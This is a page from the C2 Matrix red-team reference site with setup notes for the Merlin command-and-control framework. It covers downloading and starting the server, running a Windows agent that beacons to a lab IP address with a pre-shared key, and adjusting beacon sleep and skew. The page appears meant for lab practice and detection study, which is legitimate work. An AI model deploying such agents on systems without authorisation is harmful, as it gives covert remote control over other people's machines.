C2 Matrix
  • The C2 Matrix
  • About
  • SANS Slingshot C2 Matrix VM
  • Contribute
  • Feedback
  • Lab Infrastructure
    • C2 Matrix Eval Lab
    • Basic Lab
    • Virtual Machines with C2s
    • Docker
    • Resources
  • C2
    • Caldera
    • Covenant
    • Deimos
    • Empire3
    • Empire5
    • Havoc
    • ibombshell
    • Koadic
    • Merlin
    • Mythic
    • Nuages
    • PoshC2
    • PowerHub
    • SilentTrinity
    • Sliver
    • SCYTHE
    • TrevorC2
  • Attack Infrastructure
    • Resources
    • Redirectors/Relays
  • Detection
    • Basics
    • Beacons
    • JA3/JA3S Hashes
    • JARM
Powered by GitBook
On this page
  • Install Merlin
  • Run Merlin
  • Agent Deployment
  • Interact with Agent

Was this helpful?

  1. C2

Merlin

PreviousKoadicNextMythic

Last updated 5 years ago

Was this helpful?

Install Merlin

apt install golang
mkdir /opt/merlin
cd /opt/merlin
wget https://github.com/Ne0nd0g/merlin/releases/download/v0.8.0/merlinServer-Linux-x64-v0.8.0.BETA.7z
7z x merlinServer-Linux-x64-v0.8.0.BETA.7z

Run Merlin

cd /opt/merlin
sudo ./merlinServer-Linux-x64 -i <IP> -psk <key>

Agent Deployment

Download agent from releases:

merlinAgent-Windows-x64.exe -url https://10.0.0.194:443 -psk test

Interact with Agent

interact <Agent ID>

Test beacon delay

set sleep 10s

set skew 5

Visit wiki for additional information on interacting with an agent:

https://github.com/Ne0nd0g/merlin/wiki/Merlin-Server-Agent-Menu
https://github.com/Ne0nd0g/merlin/releases